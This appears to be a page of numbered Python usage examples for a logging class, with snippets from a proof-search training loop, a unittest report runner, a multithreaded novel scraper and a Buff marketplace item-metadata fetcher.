            time.sleep(1)
            return

        self._policy_optimizer.step()

        self._syn.broadcast({'config': self._config})

        if self._last_update is not None:
            update_delta = time.time() - self._last_update
        else:
            update_delta = 0.0
        self._last_update = time.time()

        act_loss_meter = Meter()
        lft_loss_meter = Meter()
        rgt_loss_meter = Meter()
        test_act_loss_meter = Meter()
        test_lft_loss_meter = Meter()
        test_rgt_loss_meter = Meter()

        for info in infos:
            if 'act_loss' in info:
                act_loss_meter.update(info['act_loss'])
            if 'lft_loss' in info:
                lft_loss_meter.update(info['lft_loss'])
            if 'rgt_loss' in info:
                rgt_loss_meter.update(info['rgt_loss'])
            if 'test_act_loss' in info:
                test_act_loss_meter.update(info['test_act_loss'])
            if 'test_lft_loss' in info:
                test_lft_loss_meter.update(info['test_lft_loss'])
            if 'test_rgt_loss' in info:
                test_rgt_loss_meter.update(info['test_rgt_loss'])

        Log.out(
            "PROOFTRACE SYN RUN", {
                'epoch': self._epoch,
                'run_time': "{:.2f}".format(time.time() - run_start),
                'update_count': len(infos),
                'update_delta': "{:.2f}".format(update_delta),
                'act_loss': "{:.4f}".format(act_loss_meter.avg or 0.0),
                'lft_loss': "{:.4f}".format(lft_loss_meter.avg or 0.0),
                'rgt_loss': "{:.4f}".format(rgt_loss_meter.avg or 0.0),
                'test_act_loss': "{:.4f}".format(test_act_loss_meter.avg
                                                 or 0.0),
                'test_lft_loss': "{:.4f}".format(test_lft_loss_meter.avg
                                                 or 0.0),
                'test_rgt_loss': "{:.4f}".format(test_rgt_loss_meter.avg
                                                 or 0.0),
            })

        if self._tb_writer is not None:
            self._tb_writer.add_scalar(
                "prooftrace_lm_train/update_delta",
                update_delta,
                self._epoch,
            )
            self._tb_writer.add_scalar(
                "prooftrace_lm_train/update_count",
                len(infos),
                self._epoch,
            )
            if act_loss_meter.avg is not None:
                self._tb_writer.add_scalar(
                    "prooftrace_lm_train/act_loss",
                    act_loss_meter.avg,
                    self._epoch,
                )
            if lft_loss_meter.avg is not None:
                self._tb_writer.add_scalar(
                    "prooftrace_lm_train/lft_loss",
                    lft_loss_meter.avg,
                    self._epoch,
                )
            if rgt_loss_meter.avg is not None:
                self._tb_writer.add_scalar(
                    "prooftrace_lm_train/rgt_loss",
                    rgt_loss_meter.avg,
                    self._epoch,
                )

            if test_act_loss_meter.avg is not None:
                self._tb_writer.add_scalar(
                    "prooftrace_lm_test/act_loss",
                    test_act_loss_meter.avg,
                    self._epoch,
                )
            if test_lft_loss_meter.avg is not None:
                self._tb_writer.add_scalar(
                    "prooftrace_lm_test/lft_loss",
                    test_lft_loss_meter.avg,
                    self._epoch,
                )
            if test_rgt_loss_meter.avg is not None:
                self._tb_writer.add_scalar(
                    "prooftrace_lm_test/rgt_loss",
                    test_rgt_loss_meter.avg,
                    self._epoch,
                )

        self._epoch += 1

        if self._epoch % 100 == 0:
            self.save()
Пример #28
0
"""

import os
import time
import unittest

from case.test_example import MyTest
from common.HTMLTestReportCN import HTMLTestRunner
from utils.config import Config
from common.element_enum import Element
from utils.log import Log
from utils.my_email import Email

if __name__ == '__main__':
    # 日志器
    Log.info('begin test...')
    # 配置文件读取
    config = Config()

    # 组织测试用例集
    suite = unittest.TestSuite()
    suite.addTests(unittest.TestLoader().loadTestsFromTestCase(MyTest))

    # 生成Html测试报告名字
    now = time.strftime("%Y-%m-%d %Hh_%Mm", time.localtime(time.time()))
    filename = os.path.join(Element.REPORT_DIR, now + "_report.html")

    # 使用HTMLTestRunner运行测试用例,并生成测试报告
    with open(filename, "wb") as fl:
        report = config.get("report")
        runner = HTMLTestRunner(stream=fl,
Пример #29
0
 def _remove_ack_msg(self, msg: Message):
     """ Removes the ack message """
     Log.log(MsgType.SUCCESS, "Adapter - ACK", msg)
     m = self._validation.pop(str(msg.msg_id), None)
     del m
Пример #30
0
def task(t_n=2,
         d_n=4,
         is_test=False,
         is_timer=True,
         is_category=True,
         is_book=True,
         is_item=True,
         is_download=True):
    '''
    t_n 更新表线程数
    d_n 下载线程数
    '''

    root_log = Log(filename=u'log.log', name='root')
    root_logger = root_log.Logger
    table = Table(logger=root_logger)
    table.create_tables()

    tasks = []

    ##获取分类信息
    if is_category:

        task_categorys = threading.Thread(target=task_category,
                                          name='Thread-task-category',
                                          kwargs=dict(logger=root_logger,
                                                      is_test=is_test))
        tasks.append(task_categorys)

    ##获取各个分类下书籍信息
    if is_book:
        log = Log(filename='book.log', name=u'book')
        book_logger = log.Logger
        task_books = task_book(logger=book_logger, t_n=t_n, is_test=is_test)
        tasks = tasks + task_books

    #获取各本书籍下的章节信息
    if is_item:
        item_log = Log(filename=u'item.log', name='item')
        item_logger = item_log.Logger
        task_items = task_item(logger=item_logger, t_n=t_n, is_test=is_test)
        tasks = tasks + task_items

    #获取未下载章节信息
    if is_download:

        download_log = Log(filename=u'download.log', name='download')
        download_logger = download_log.Logger
        task_downloads = task_download(logger=download_logger, t_n=d_n)
        tasks = tasks + task_downloads

    ##实时更新table category中book_count,table book中的d_count,total,rate
    if is_timer:
        table_log = Log(filename=u'table.log', name='table')
        table_logger = table_log.Logger
        task_tables = task_table(logger=table_logger, t_n=d_n, is_test=is_test)
        tasks = tasks + task_tables

    for t in tasks:
        t.start()

    for t in tasks:
        t.join()

    print u'all jobs finished'
Пример #31
0
def search():
    parser = argparse.ArgumentParser(description="")

    parser.add_argument(
        'config_path',
        type=str, help="path to the config file",
    )
    parser.add_argument(
        '--dataset_size',
        type=str, help="config override",
    )
    parser.add_argument(
        '--load_dir',
        type=str, help="config override",
    )

    parser.add_argument(
        '--device',
        type=str, help="config override",
    )

    args = parser.parse_args()

    config = Config.from_file(args.config_path)

    if args.device is not None:
        config.override('device', args.device)

    if args.dataset_size is not None:
        config.override(
            'prooftrace_dataset_size',
            args.dataset_size,
        )
    if args.load_dir is not None:
        config.override(
            'prooftrace_load_dir',
            os.path.expanduser(args.load_dir),
        )

    dataset_dir = os.path.join(
        os.path.expanduser(config.get('prooftrace_dataset_dir')),
        config.get('prooftrace_dataset_size'),
        'test_traces'
    )

    assert os.path.isdir(dataset_dir)
    files = [
        os.path.join(dataset_dir, f)
        for f in os.listdir(dataset_dir)
        if os.path.isfile(os.path.join(dataset_dir, f))
    ]
    cases = []

    with gzip.open(
            os.path.join(
                os.path.expanduser(config.get('prooftrace_dataset_dir')),
                config.get('prooftrace_dataset_size'),
                'traces.tokenizer',
            ), 'rb') as f:
        tokenizer = pickle.load(f)

    for p in files:
        match = re.search("_(\\d+)_(\\d+)\\.actions$", p)
        if match is None:
            continue
        ptra_len = int(match.group(1))
        cases.append((p, ptra_len))

    Log.out(
        "Loaded ProofTraceActions", {
            'cases': len(cases),
        })

    model = SearchModel(config).load()

    cases = sorted(cases, key=lambda c: c[1])

    for i in range(len(cases)):
        c = cases[i][0]
        with gzip.open(c, 'rb') as f:
            ground = pickle.load(f)

        ptra = ProofTraceActions(
            'BEAM-{}-{}'.format(
                datetime.datetime.now().strftime("%Y%m%d_%H%M_%S.%f"),
                random.randint(0, 9999),
            ),
            [
                ground.actions()[i] for i in range(ground.len())
                if ground.actions()[i].value in INV_PREPARE_TOKENS
            ],
            [
                ground.arguments()[i] for i in range(ground.len())
                if ground.actions()[i].value in INV_PREPARE_TOKENS
            ],
        )
        repl = REPL(tokenizer)
        target = repl.prepare(ptra)

        offset = 0
        fixed_gamma = 4
        if fixed_gamma > 0:
            gamma_len = max(ground.action_len() - fixed_gamma, 0)
            offset = ground.prepare_len() + gamma_len

            for i in range(gamma_len):
                assert ground.prepare_len() + i < ground.len() - 1
                pos = ground.prepare_len() + i

                action = ground.actions()[pos]
                argument = ground.arguments()[pos]

                thm = repl.apply(action)

                action._index = thm.index()
                argument._index = thm.index()

                ptra.append(action, argument)

        Log.out("TARGET", {
            'name': ground.name(),
            'prepare_length': ground.prepare_len(),
            'length': ground.action_len(),
            'summary': ground.summary(offset),
        })

        search = None
        if config.get('prooftrace_search_type') == 'beam':
            search = Beam(config, model, ptra, repl, target)
        if config.get('prooftrace_search_type') == 'mcts':
            search = MCTS(config, model, ptra, repl, target)
        assert search is not None

        depth = config.get('prooftrace_search_depth')
        if config.get('prooftrace_search_type') == 'beam':
            depth = fixed_gamma * 2

        for i in range(depth):
            done, ptra, proved = search.step(False, offset)
            if done:
                break
Пример #32
0
class WeaponMetadata:
    def sql_values(self):
        rt_tuple = (
            str(self.item_name if hasattr(self, 'item_name'
                                          ) else '#DataNotFound#'),
            str(self.buff_id if hasattr(self, 'buff_id') else '#DataNotFound#'
                ),
            str(self.meta_data_refreshed_time if hasattr(
                self, 'meta_data_refreshed_time') else '#DataNotFound#'),
            str(self.type if hasattr(self, 'type') else '#DataNotFound#'),
            str(self.exhibition_image if hasattr(self, 'exhibition_image'
                                                 ) else '#DataNotFound#'),
            str(self.steam_market_url if hasattr(self, 'steam_market_url'
                                                 ) else '#DataNotFound#'))

        return rt_tuple

    def __init__(self, buff_id, db):
        self.buff_id = buff_id
        self.logger = Log('Weapon-Metadata')

        query_result = db.query_weapon_metadata(buff_id)

        if not query_result[0]:

            url = api_concat(api_list.BUFF_SELL_ORDER_API, buff_id)
            request = requests.get(url, headers=HEADERS, cookies=COOKIES)
            request.encoding = 'utf-8'
            content = request.text

            if content:
                jsonified = json.loads(content)

                if jsonified['code'] == 'OK':

                    item = jsonified['data']['goods_infos'][str(buff_id)]

                    try:

                        self.item_name = item['name']
                        self.meta_data_refreshed_time = time.time()
                        self.steam_market_url = 'https://steamcommunity.com/market/listings/730/' + str(
                            item['market_hash_name']).replace(' ', '%20')
                        self.exhibition_image = item['icon_url']
                        self.type = item['tags']['category']['internal_name']

                    # In case of single column of data-loss, keep it the False value.
                    # This error will be sent to database to save as NULL value.
                    except KeyError:
                        self.logger.log(
                            'Item %s does not contain some value.' %
                            self.item_name)

                else:
                    raise ValueError('[WeaponMetadata] Buff fetch error.')
            else:
                raise ValueError('Buff returned nothing.')
        else:
            self.item_name, self.meta_data_refreshed_time, self.steam_market_url, self.exhibition_image, self.type = \
                (query_result[1][0][0], query_result[1][0][2], query_result[1][0][5], query_result[1][0][4],
                 query_result[1][0][3])